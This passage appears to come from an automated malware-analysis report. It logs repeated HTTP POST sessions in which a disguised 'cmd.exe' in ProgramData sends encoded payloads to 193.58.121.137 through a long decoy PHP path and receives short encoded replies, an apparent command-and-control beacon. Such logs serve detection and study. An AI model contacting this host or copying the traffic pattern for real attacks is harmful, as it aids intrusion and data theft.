                                                                                                                                  Data Ascii: %3&#$^/'*1(<92$["?U)U3*?"<56,.+*#[!61:%_1, C$-5<! =>5#83"$'_(='!Q:$0>'?&2=3 "&8*,"72"+5)%"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  22192.168.2.449770193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:58.498054028 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:58.856779099 CET2560OUTData Raw: 5f 50 5c 53 5c 47 5a 51 5a 5c 55 51 59 5f 54 5a 56 5c 5d 48 50 55 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _P\S\GZQZ\UQY_TZV\]HPUZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+ #_3>\''"2/ X<?Q<4=&.(# .%\ $8?'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:47:59.258640051 CET25INHTTP/1.1 100 Continue


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  23192.168.2.449778193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:59.484647989 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:59.841916084 CET2560OUTData Raw: 5f 53 5c 5a 59 4b 5f 57 5a 5c 55 51 59 5b 54 57 56 5b 5d 47 50 56 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\ZYK_WZ\UQY[TWV[]GPVZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B) ,$1]1Q:1 \>=;V<4%2.>U(.=^ <-'_!%Y)3
                                                                                                                                  Jan 3, 2025 20:48:00.343364954 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:00.476895094 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:00 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  24192.168.2.449787193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:01.059067965 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:01.403775930 CET2560OUTData Raw: 5a 52 5c 59 5c 47 5a 54 5a 5c 55 51 59 56 54 55 56 51 5d 49 50 54 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZR\Y\GZTZ\UQYVTUVQ]IPTZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(303=6&$:&<Z<+()1>)=#<99\#Q;)='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:01.712651014 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:01.851799965 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:01 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  25192.168.2.449793193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:01.982952118 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:02.341181993 CET2560OUTData Raw: 5a 53 5c 5c 59 41 5a 52 5a 5c 55 51 59 5b 54 52 56 59 5d 45 50 53 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZS\\YAZRZ\UQY[TRVY]EPSZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)0\'=%[''"2? >-U)79&=9U> :&5_7'((='_!%Y)3
                                                                                                                                  Jan 3, 2025 20:48:02.637207031 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:02.770019054 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:02 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  26192.168.2.449799193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:02.887909889 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:03.451944113 CET2560OUTData Raw: 5f 57 59 5a 59 4a 5a 57 5a 5c 55 51 59 59 54 54 56 58 5d 43 50 52 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _WYZYJZWZ\UQYYTTVX]CPRZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ '.9&7:2?,[?[?T+&Q2*>U?Y-\"7'V?='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:03.531498909 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:03.692979097 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:03 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  27192.168.2.449805193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:03.838746071 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:04.185029984 CET2560OUTData Raw: 5f 5e 5c 5e 5c 43 5a 53 5a 5c 55 51 59 5b 54 50 56 5d 5d 43 50 55 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^\^\CZSZ\UQY[TPV]]CPUZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%)0<0>*&Y%<'(= ?%2>>Z977/W+'_!%Y)3


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  28192.168.2.449807193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:04.416479111 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1884
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:04.763025999 CET1884OUTData Raw: 5f 50 5c 5f 59 41 5a 52 5a 5c 55 51 59 5c 54 53 56 5d 5d 42 50 56 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _P\_YAZRZ\UQY\TSV]]BPVZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?00X!]%6%Y+-+<&%-)R) .C94;(-'_!%Y)/
                                                                                                                                  Jan 3, 2025 20:48:05.098258972 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:05.317522049 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:05 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 06 25 36 3c 1a 27 28 24 08 30 3a 0c 1b 2b 02 37 09 2e 32 20 5a 35 14 38 0c 3e 0d 38 58 3e 3f 01 04 36 3f 35 09 22 3f 2e 00 2a 2a 23 5b 03 1d 22 12 22 32 39 07 32 39 31 10 2c 30 20 43 24 2d 39 12 28 3e 08 0b 34 3e 22 52 35 3d 3c 1f 38 0d 2d 10 26 3c 27 5f 3f 13 2e 10 33 2f 21 51 00 10 39 55 33 33 17 5e 24 02 3e 5f 31 2d 25 58 27 35 3c 07 21 02 3e 52 25 5e 31 5e 3b 0b 3f 09 25 32 2b 0b 22 33 2b 05 3d 07 2e 0f 32 11 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: %%6<'($0:+7.2 Z58>8X>?6?5"?.**#[""29291,0 C$-9(>4>"R5=<8-&<'_?.3/!Q9U33^$>_1-%X'5<!>R%^1^;?%2+"3+=.2"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  29192.168.2.449808193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:04.501436949 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:04.856719971 CET2560OUTData Raw: 5f 52 5c 5c 5c 44 5f 55 5a 5c 55 51 59 58 54 53 56 58 5d 48 50 55 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _R\\\D_UZ\UQYXTSVX]HPUZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%C++Y3"%'*%/ ?.4<&$=)R* #9%X"4?R+='_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:05.144799948 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:05.357927084 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:05 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  30192.168.2.449815193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:05.484060049 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:05.841231108 CET2560OUTData Raw: 5a 52 59 5a 59 43 5a 54 5a 5c 55 51 59 5d 54 5b 56 5b 5d 46 50 54 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZRYZYCZTZ\UQY]T[V[]FPTZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&< $.5]&Q&1Z4Y<?+B:%=/_:9 V?='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:06.203528881 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:06.347481966 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:06 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  31192.168.2.449823193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:07.302350044 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:07.653898001 CET2552OUTData Raw: 5f 5f 5c 53 5c 43 5a 5b 5a 5c 55 51 59 5e 54 51 56 5f 5d 41 50 52 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __\S\CZ[Z\UQY^TQV_]APRZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+0?_$"%'6',Y?#)'6P%-9) 0.&=\ Q'+'_!%Y)/
                                                                                                                                  Jan 3, 2025 20:48:07.936013937 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:08.064183950 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:07 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  32192.168.2.449828193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:08.197770119 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:08.544461966 CET2560OUTData Raw: 5a 55 5c 52 59 4a 5f 50 5a 5c 55 51 59 5d 54 54 56 50 5d 49 50 5c 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZU\RYJ_PZ\UQY]TTVP]IP\Z^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+?39\%7%<>>+Q+5$.:>0,9547#W<='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:08.854572058 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:08.989757061 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:08 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  33192.168.2.449836193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:09.312822104 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:09.682272911 CET2560OUTData Raw: 5f 5f 59 5d 59 43 5a 53 5a 5c 55 51 59 58 54 51 56 50 5d 49 50 52 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __Y]YCZSZ\UQYXTQVP]IPRZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&< $61"2 [<-($.Q$=**<.Y4$<='_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:09.987142086 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:10.118899107 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:09 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  34192.168.2.449843193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:10.248255014 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:10.606941938 CET2560OUTData Raw: 5a 55 5c 53 5c 47 5a 5a 5a 5c 55 51 59 56 54 57 56 5f 5d 42 50 5c 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
